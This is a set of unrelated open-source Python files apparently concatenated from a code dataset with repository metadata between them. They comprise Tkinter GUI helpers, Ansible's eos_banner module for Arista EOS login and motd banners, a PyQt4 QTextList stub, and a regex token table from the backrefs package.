entry.bind("<FocusOut>", attach_func)
entry.grid(**grid_kwargs)
entry.config(**config_kwargs)
return entry
def _add_optionmenu(frame, val, items, optionmenu_kwargs={}, grid_kwargs={}, config_kwargs={}):
"""Add a dropdown menu"""
variable = tk.StringVar()
variable.set(val)
optionmenu = tk.OptionMenu(frame, variable, *items, **optionmenu_kwargs)
optionmenu.grid(**grid_kwargs)
optionmenu.config(**config_kwargs)
return optionmenu, variable
def _add_radio(frame, val, radio_kwargs={}, grid_kwargs={}, config_kwargs={}, variable=None):
"""Add a radio button"""
if variable is None:
variable = tk.StringVar()
variable.set(val)
radio = tk.Radiobutton(frame, variable=variable, **radio_kwargs)
radio.grid(**grid_kwargs)
radio.config(**config_kwargs)
def _add_checkbutton(frame, val, checkbutton_kwargs={}, grid_kwargs={}, config_kwargs={}, variable=None):
"""Add a radio button"""
if variable is None:
variable = tk.BooleanVar()
variable.set(val)
checkbutton = tk.Checkbutton(frame, variable=variable, **checkbutton_kwargs)
checkbutton.grid(**grid_kwargs)
checkbutton.config(**config_kwargs)
return checkbutton
def _add_mpl_canvas(frame, figure, grid_kwargs={}):
canvas = FigureCanvasTkAgg(figure, frame)
canvas.show()
widget = canvas.get_tk_widget()
widget.grid(**grid_kwargs)
return canvas
if __name__ == "__main__":
gui = GUI()
|
gpl-3.0
|
kennethgillen/ansible
|
lib/ansible/modules/network/eos/eos_banner.py
|
1
|
5522
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: eos_banner
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage multiline banners on Arista EOS devices
description:
- This will configure both login and motd banners on remote devices
    running Arista EOS. It allows playbooks to add or remove
banner text from the active running configuration.
extends_documentation_fragment: eos
options:
banner:
description:
      - Specifies which banner should be
configured on the remote device.
required: true
default: null
    choices: ['login', 'motd']
text:
description:
- The banner text that should be
present in the remote device running configuration. This argument
accepts a multiline string. Requires I(state=present).
default: null
state:
description:
- Specifies whether or not the configuration is
        present in the current device's active running configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure the login banner
eos_banner:
banner: login
text: |
this is my login banner
that contains a multiline
string
state: present
- name: remove the motd banner
  eos_banner:
    banner: motd
    state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- banner login
- this is my login banner
- that contains a multiline
- string
- EOF
session_name:
description: The EOS config session name used to load the configuration
returned: if changes
type: str
sample: ansible_1479315771
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.eos import load_config, run_commands
from ansible.module_utils.eos import eos_argument_spec, check_args
def map_obj_to_commands(updates, module):
commands = list()
want, have = updates
state = module.params['state']
if state == 'absent' and 'text' in have.keys() and have['text']:
commands.append('no banner %s' % module.params['banner'])
elif state == 'present':
if want['text'] and (want['text'] != have.get('text')):
if module.params['transport'] == 'cli':
commands.append('banner %s' % module.params['banner'])
commands.extend(want['text'].strip().split('\n'))
commands.append('EOF')
else:
# For EAPI we need to construct a dict with cmd/input
# key/values for the banner
commands.append({'cmd': 'banner %s' % module.params['banner'],
'input': want['text'].strip('\n')})
return commands
def map_config_to_obj(module):
output = run_commands(module, ['show banner %s' % module.params['banner']])
obj = {'banner': module.params['banner'], 'state': 'absent'}
if output:
if module.params['transport'] == 'cli':
obj['text'] = output[0]
else:
# On EAPI we need to extract the banner text from dict key
# 'loginBanner'
obj['text'] = output[0]['loginBanner'].strip('\n')
obj['state'] = 'present'
return obj
def map_params_to_obj(module):
text = module.params['text']
if text:
text = str(text).strip()
return {
'banner': module.params['banner'],
'text': text,
'state': module.params['state']
}
def main():
""" main entry point for module execution
"""
argument_spec = dict(
banner=dict(required=True, choices=['login', 'motd']),
text=dict(),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(eos_argument_spec)
required_if = [('state', 'present', ('text',))]
module = AnsibleModule(argument_spec=argument_spec,
required_if=required_if,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247971765/PyQt4/QtGui/QTextList.py
|
1
|
1994
|
# encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python3/dist-packages/PyQt4/QtGui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from .QTextBlockGroup import QTextBlockGroup
class QTextList(QTextBlockGroup):
""" QTextList(QTextDocument) """
def add(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.add(QTextBlock) """
pass
def count(self): # real signature unknown; restored from __doc__
""" QTextList.count() -> int """
return 0
def format(self): # real signature unknown; restored from __doc__
""" QTextList.format() -> QTextListFormat """
return QTextListFormat
def isEmpty(self): # real signature unknown; restored from __doc__
""" QTextList.isEmpty() -> bool """
return False
def item(self, p_int): # real signature unknown; restored from __doc__
""" QTextList.item(int) -> QTextBlock """
return QTextBlock
def itemNumber(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.itemNumber(QTextBlock) -> int """
return 0
def itemText(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.itemText(QTextBlock) -> str """
return ""
def remove(self, QTextBlock): # real signature unknown; restored from __doc__
""" QTextList.remove(QTextBlock) """
pass
def removeItem(self, p_int): # real signature unknown; restored from __doc__
""" QTextList.removeItem(int) """
pass
def setFormat(self, QTextListFormat): # real signature unknown; restored from __doc__
""" QTextList.setFormat(QTextListFormat) """
pass
def __init__(self, QTextDocument): # real signature unknown; restored from __doc__
pass
def __len__(self, *args, **kwargs): # real signature unknown
""" Return len(self). """
pass
|
gpl-2.0
|
shriker/sublime
|
Packages/backrefs/st3/backrefs/common_tokens.py
|
2
|
1495
|
"""
Common tokens shared between the different regex modules.
Licensed under MIT
Copyright (c) 2015 - 2016 Isaac Muse <isaacmuse@gmail.com>
"""
import re
# Unicode string related references
utokens = {
"replace_tokens": set("cCElL"),
"verbose_tokens": set("# "),
"empty": "",
"ls_bracket": "[",
"rs_bracket": "]",
"b_slash": "\\",
"esc_end": "\\E",
"end": "E",
"quote": "Q",
"lc": "l",
"lc_span": "L",
"uc": "c",
"uc_span": "C",
"hashtag": '#',
"nl": '\n',
"negate": '^',
"verbose_flag": 'x',
"re_replace_ref": re.compile(
r'''(?x)
(\\)+
(
[cClLE]
)? |
(
[cClLE]
)
'''
),
"unicode_flag": 'u'
}
# Byte string related references
btokens = {
"replace_tokens": set(
[b"c", b"C", b"E", b"l", b"L"]
),
"verbose_tokens": set([b"#", b" "]),
"empty": b"",
"ls_bracket": b"[",
"rs_bracket": b"]",
"b_slash": b"\\",
"esc_end": b"\\E",
"end": b"E",
"quote": b"Q",
"lc": b"l",
"lc_span": b"L",
"uc": b"c",
"uc_span": b"C",
"hashtag": b'#',
"nl": b'\n',
"negate": b'^',
"verbose_flag": b'x',
"re_replace_ref": re.compile(
br'''(?x)
(\\)+
(
[cClLE]
)? |
(
[cClLE]
)
'''
),
"re_flags": re.compile(
br'(?s)(\\.)|\(\?([iLmsux]+)\)|(.)'
),
"unicode_flag": b'u'
}
|
mit
|